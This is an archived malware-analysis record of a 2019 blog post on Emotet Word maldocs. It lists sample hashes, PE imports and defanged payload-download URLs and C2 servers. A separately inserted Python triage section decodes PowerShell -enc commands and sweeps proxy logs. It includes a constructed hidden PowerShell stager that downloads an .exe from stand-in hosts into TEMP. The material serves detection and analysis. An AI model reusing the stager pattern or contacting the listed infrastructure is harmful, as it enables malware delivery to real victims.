{
	"id": "948163f8-cf57-4a4e-a5d3-c75e0f56f10a",
	"created_at": "2026-04-06T00:07:50.966418Z",
	"updated_at": "2026-04-10T13:12:54.520017Z",
	"deleted_at": null,
	"sha1_hash": "4cac21552c2f27d8c0e44fa077604812035e91f0",
	"title": "Return of the mummy - welcome back, emotet",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1267344,
	"plain_text": "Return of the mummy - welcome back, emotet\r\nBy f0wL\r\nPublished: 2019-09-24 · Archived: 2026-04-05 18:12:31 UTC\r\nTue 24 September 2019 in Banking-Malware\r\nOr, to be more historically precise: Imhotep was the Egyptian, Emotet is the malware strain we are going to take a look at. Last week it returned from its summer vacation with a few new tricks.\r\nA short disclaimer: downloading and running the samples linked below will compromise your computer and data, so be f$cking careful. Also check your local laws, as owning malware binaries/sources might be illegal depending on where you live.\r\nEmotet Sample #1 @ Hybrid Analysis --\u003e sha256 6076e26a123aaff20c0529ab13b2c5f11259f481e43d62659b33517060bb63c5\r\nEmotet Sample #2 @ Hybrid Analysis --\u003e sha256 757b35d20f05b98f2c51fc7a9b6a57ccbbd428576563d3aff7e0c6b70d544975\r\nEmotet brought home a few souvenirs from its summer trip as well. The images above and below show the two most common decoy header pictures that the distributed maldocs use. To hide the malicious VBA code, they placed small textboxes containing the embedded macro beneath the picture.\r\nAnyRun Analysis\r\nhttps://dissectingmalwa.re/return-of-the-mummy-welcome-back-emotet.html\r\nPage 1 of 9\r\nAs researchers at Malwarebytes found out, the malspammers are even trying to lure people into downloading the infected Word documents by advertising them as Edward Snowden's new book \"Permanent Record\".
Seems like the criminals have reached a new moral low point.\r\nThe following two screenshots are excerpts of the report generated by oletools on an Emotet Word document.\r\nAfter decoding the Base64 string we get this command as a result:\r\n$solidstatePPV76='RhodeIslandB832';$turquoiseXDz48 = '844';$compressEq464='monitorcJX36';$PersistentW\r\nTaking a peek at the imports, we can see that the malware uses (amongst other functions) TerminateProcess, IsDebuggerPresent and GetTimeZoneInformation, imported from kernel32.dll.\r\nFurthermore, it also imports various functions from advapi32.dll, such as RegDeleteValueW, to modify the registry. It uses the IsDebuggerPresent function (declared in debugapi.h) to check whether it is actively being debugged, and will exit if it returns true.\r\nThe Any.Run analysis of the second sample can be found here.\r\nLooks like we stumbled across a real typography expert as well 😹\r\nSquirrel Shootout?!
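The macro hidden in the maldoc ends up running a Base64-blob PowerShell command like the one decoded above. The helpers below are an added example written for this page; they are not code from the original post, from oletools or from Emotet itself. They decode a -EncodedCommand blob (Base64 over the UTF-16LE bytes of the script, which is why a plain ASCII Base64 decode yields NUL-interleaved garbage), pull the download URLs out of the decoded script, defang them in the hxxp / [.] style the IOC list below uses, and sweep a proxy log for hits on either a payload URL or a C2 host:port. The sample script, its .Split('@') URL list, the command line, the log lines and the 203.0.113.7:8080 C2 are all constructed for the example (.invalid and TEST-NET addresses) and are assumptions, not observations about these samples. That powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...) is real behaviour the regex relies on.

```python
"""Added triage helpers for the maldoc -> PowerShell stage described in this post.

Every sample value in this file (script, command line, log lines, C2 address)
is constructed for the example; none of it comes from the real Emotet samples.
"""
import base64
import re
from urllib.parse import urlsplit, urlunsplit

# powershell.exe accepts any unambiguous prefix of -EncodedCommand
# (-e, -ec, -enc, -encodedcommand ...); match that, then the Base64 blob.
ENCODED_CMD_RE = re.compile(r"-(?:e|ec|enc[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.I)
URL_RE = re.compile(r"""https?://[^\s'"@]+""", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """-EncodedCommand is Base64 over the UTF-16LE bytes of the script, not ASCII."""
    m = ENCODED_CMD_RE.search(cmdline)
    if not m:
        raise ValueError("no -EncodedCommand switch in command line")
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)  # launchers sometimes drop the '=' padding
    return base64.b64decode(blob).decode("utf-16le")


def extract_urls(script: str) -> list[str]:
    """All http(s) URL literals in the decoded script, in order, without duplicates."""
    seen: set[str] = set()
    out = []
    for url in URL_RE.findall(script):
        if url not in seen:
            seen.add(url)
            out.append(url)
    return out


def defang(url: str) -> str:
    """hxxp:// plus [.] at the last dot of the host, as in this post's IOC list."""
    scheme, netloc, path, query, frag = urlsplit(url)
    host, sep, port = netloc.partition(":")  # keep the port out of the bracketing
    head, dot, tail = host.rpartition(".")
    if dot:
        host = f"{head}[.]{tail}"
    return urlunsplit((scheme.replace("http", "hxxp"), host + sep + port, path, query, frag))


def refang(ioc: str) -> str:
    """Inverse of defang(), so defanged IOCs can be compared with real log URLs."""
    return ioc.replace("hxxp", "http", 1).replace("[.]", ".")


def find_hits(proxy_log: str, download_iocs, c2_iocs):
    """Return (client, kind, url) for log lines that fetch a payload URL or talk to a C2.

    Assumed (constructed) log format: '<timestamp> <client-ip> <method> <url> <status>'.
    Payload URLs are matched by prefix because the real download appends a filename;
    C2s are matched on host:port because the URI paths rotate.
    """
    prefixes = tuple(refang(i) for i in download_iocs)
    c2_hosts = {urlsplit(refang(i)).netloc for i in c2_iocs}
    hits = []
    for line in proxy_log.splitlines():
        _ts, client, _method, url, _status = line.split()
        if url.startswith(prefixes):
            hits.append((client, "payload-download", url))
        elif urlsplit(url).netloc in c2_hosts:
            hits.append((client, "c2-checkin", url))
    return hits


# --- constructed sample data (not from the real samples) ---------------------
SAMPLE_SCRIPT = (
    "$wc=New-Object Net.WebClient;"
    "$list='http://example-one.invalid/wp-content/abc/@https://example-two.invalid/eedy/xyz/'.Split('@');"
    "foreach($u in $list){try{$wc.DownloadFile($u,$env:TEMP+'\\131.exe');break}catch{}}"
)
SAMPLE_CMDLINE = "powershell -w hidden -enc " + base64.b64encode(
    SAMPLE_SCRIPT.encode("utf-16le")).decode()
C2_IOCS = ["hxxp://203.0.113[.]7:8080/sess/"]  # TEST-NET-3 address standing in for a C2
SAMPLE_PROXY_LOG = """\
2019-09-24T10:01:02Z 10.0.0.15 GET https://example-two.invalid/eedy/xyz/131.exe 200
2019-09-24T10:01:09Z 10.0.0.22 GET https://www.example.com/ 200
2019-09-24T10:02:40Z 10.0.0.15 POST http://203.0.113.7:8080/sess/ 200
"""

if __name__ == "__main__":
    script = decode_encoded_command(SAMPLE_CMDLINE)
    download_iocs = [defang(u) for u in extract_urls(script)]
    print("\n".join(download_iocs))
    for client, kind, url in find_hits(SAMPLE_PROXY_LOG, download_iocs, C2_IOCS):
        print(client, kind, url)
```

With a real launcher command line taken from the oletools output, feed it to decode_encoded_command() first; the decoded stage is often itself obfuscated (the variable names in the command above are a taste of it) and may need another pass before URL_RE finds anything. Defanging only the last dot of the host mirrors the list below, so the refang() round trip is lossless and the same strings can drive both the write-up and the log sweep.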
Sounds like another attempt to disguise itself as a different executable.\r\nInteresting strings all around 🤔\r\nAnother quite interesting tool to unpack and analyze Emotet is tracecorn_tina, which is (as the name might already suggest) based on tracecorn, a Windows API tracer for malware.\r\nIOCs\r\nEmotet (SHA256)\r\n6076e26a123aaff20c0529ab13b2c5f11259f481e43d62659b33517060bb63c5 (480 KiB)\r\n7080e1b236a19ed46ea28754916c43a7e8b68727c33cbf81b96077374f4dc205 (484 KiB)\r\n757b35d20f05b98f2c51fc7a9b6a57ccbbd428576563d3aff7e0c6b70d544975 (201 KiB)\r\n.docm files (SHA256)\r\nea7391b5dd01d2c79ebe16e842daacc84a0dc5f0174235bbae86b2204312a6ab --\u003e 5B99674D2005BB01760A1765E4CB3BD\r\ne3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 --\u003e 8KZLXW0QU5K8_NJC.docm (note: this is the SHA256 of an empty file, i.e. the sample was zero bytes, so the hash is not a usable indicator)\r\nc13a058b51294284b7383b5d5c78eff83529519c207376cf26e94f4e888c5114 --\u003e 9B797E5A9E5FB0789B8278134AF083A\r\nae63b306cc2787b2acac3770d706db0648f53e1fade14af0104cfcb07001e22d --\u003e ANHANG 3311 1519749319.doc\r\n82bb3612b299cba0350e1dc4c299af9d50354cc1448b1dd931017f4381d0606a --\u003e D468EA5BA7A856C12C3AC887C1A023F\r\n78d7b30a7a68c3b1da18bcf2ea84904907ecbd96d460b7d94871ac1a6ff21a35 --\u003e DETAILS_09_17_2019MW-33916.docm\r\nd88175cb5257df99953b2cfb65dff302dce425548c54706bf7d23ba6de5eef19 --\u003e DOC-16092019 6678523.doc\r\ncb4a203b541ec40e06c9d9f030dacf22747d62a771385d49d03801945b8d2e1a --\u003e FB1ADE20382673E3E1D3351FA315522\r\n1e1eedfe3066f398cdc0805ec5338e2028c0fd7085255c741d31ec35eb3bdbda --\u003e 7330786_09_23_2019_UIE76589.doc\r\nURLs\r\nhxxps://autorepuestosdml[.]com/wp-content/CiloXIptI/\r\nhxxps://pep-egypt[.]com/eedy/xx3yspke7_l7jp5-430067348/\r\nhxxps://danangluxury[.]com/wp-content/uploads/KTgQsblu/\r\nhxxps://www.gcesb[.]com/wp-includes/customize/zUfJervuM/\r\nhxxps://bondagetrip[.]com/wp-content/y0gm3xxs_hmnw8rq-764161699/\r\nhxxp://www.offmaxindia[.]com/wp-includes/b161/\r\nhxxp://www.kutrialiogludernegi[.]com/cgi-bin/6j1/\r\nhxxp://poshinternationalmedia[.]com/nqec/zcdvgy178/\r\nhxxp://drfalamaki[.]com/Mqm24/btxz33664/\r\nhxxps://gcsucai[.]com/wp-content/h891u8f8/\r\nContacted Servers\r\nhxxp://179.12.170[.]88:8080/vermont/json/ringin/\r\nhxxp://182.76.6[.]2:8080/sess/\r\nhxxp://86.98.25[.]30:53/ringin/attrib/ringin/\r\nhxxp://198.199.88[.]162:8080/sym/codec/ringin/\r\nhxxp://178.62.37[.]188:443/health/enabled/ringin/\r\nhxxp://92.222.125[.]16:7080/acquire/loadan/\r\nhxxp://45.79.188[.]67:8080/report/\r\nhxxp://45.79.188[.]67:8080/stubs/schema/ringin/\r\nhxxp://173.214.174[.]107:443/whoami.php\r\nhxxp://173.214.174[.]107:443/xian/vermont/ringin/merge/\r\nhxxp://173.214.174[.]107:443/symbols/enable/ringin/\r\nSource: https://dissectingmalwa.re/return-of-the-mummy-welcome-back-emotet.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://dissectingmalwa.re/return-of-the-mummy-welcome-back-emotet.html"
	],
	"report_names": [
		"return-of-the-mummy-welcome-back-emotet.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434070,
	"ts_updated_at": 1775826774,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4cac21552c2f27d8c0e44fa077604812035e91f0.pdf",
		"text": "https://archive.orkl.eu/4cac21552c2f27d8c0e44fa077604812035e91f0.txt",
		"img": "https://archive.orkl.eu/4cac21552c2f27d8c0e44fa077604812035e91f0.jpg"
	}
}